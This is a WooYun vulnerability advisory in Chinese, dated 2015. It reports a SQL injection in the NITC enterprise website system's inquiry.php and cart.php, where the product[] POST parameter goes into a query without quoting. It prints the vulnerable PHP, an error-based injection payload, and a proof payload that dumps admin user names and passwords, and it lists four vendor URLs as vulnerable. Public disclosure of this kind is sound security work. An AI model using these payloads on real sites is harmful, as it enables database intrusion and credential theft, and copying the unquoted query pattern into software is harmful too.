漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-081305
漏洞标题:NITC企业智能营销网站系统通杀注入
相关厂商:NITC
漏洞作者: 郭斯特
提交时间:2015-01-12 14:43
修复时间:2015-04-13 16:58
公开时间:2015-04-13 16:58
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
rt~
详细说明:
NITC是国内第一家提供永久免费“效益型网站系统”的互联网企业。2008年投入研发NITC网站系统,2009年8月推出第一个产品———“NITC免费效益型网站系统V1.0”,数年来,因为系统一直免费,耗资近500万元。NITC产品深得用户喜爱,特别是2011年7月推出的“(定海神真)免费效益型网站系统V3.2”,用户下载量巨增。NITC系统其核心优势在于“营销功能强,用户体验好”,后台管理完全按照SEM网络营销规则设定,前端页面(主题模板)全部经W3C国际网页标准认证。简单易用,界面精美,是中小企业网站营销的最佳选择,不需要专业的技术就能轻易上手,并且做出网络营销效果非常好的网站。
2013年12月NITC再度推出“企业智能营销系统V4.0”,是目前最高级版本。该产品是在V3.2的基础上细化了原来优势功能,并且增加了手机网站、在线购物、会员管理、产品评论、在线分享等功能。这标志着NITC产品进入了一个新阶段,完美的实现了“企业网站+SEO优化+购物商城+手机网站”四合一的功能。它就象变形金刚一样,应用不同需求时表现出不同的价值。
漏洞文件:
inquiry.php 和 cart.php (不同文件 但是存在一样的问题)
参数product[] 木有单引号保护
$select = $_POST['product'];
$i = 0;
for ( ; $i < count( $select ); ++$i )
{
if ( isset( $select[$i] ) )
{
$product = $db->getRow( "select product.product_id,product.model,product.small_image,product_desc.name,product.price,product.weight from ".$site->table( "product" )." as product left join ".$site->table( "product_desc" )." as product_desc on product.product_id=product_desc.product_id where product.product_id=".$select[$i]." and product_desc.language_id=".$language['language_id'] );
if ( $product )
{
$cart->add_item( SESS_ID, $select[$i], 1, $product['model'], $product['price'], $product['weight'], 1 );
}
}
}
post product 数组进来
for ( ; $i < count( $select ); ++$i )
[]中间没东西
取0
select[0]就是数组的value
导致注入
官方四个站点均存在该漏洞
exp:product[]=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,version(),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)#
漏洞证明:
http://test.nitc.cc/inquiry.php
product[]=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,lhf_user.user_name,0x27,lhf_user.password,0x27,0x7e) from lhf_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #
http://nitc.cc/inquiry.php
http://demo.cnnitc.com/inquiry.php
http://demo.nitc.cc/inquiry.php
修复方案:
过滤
版权声明:转载请注明来源 郭斯特@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝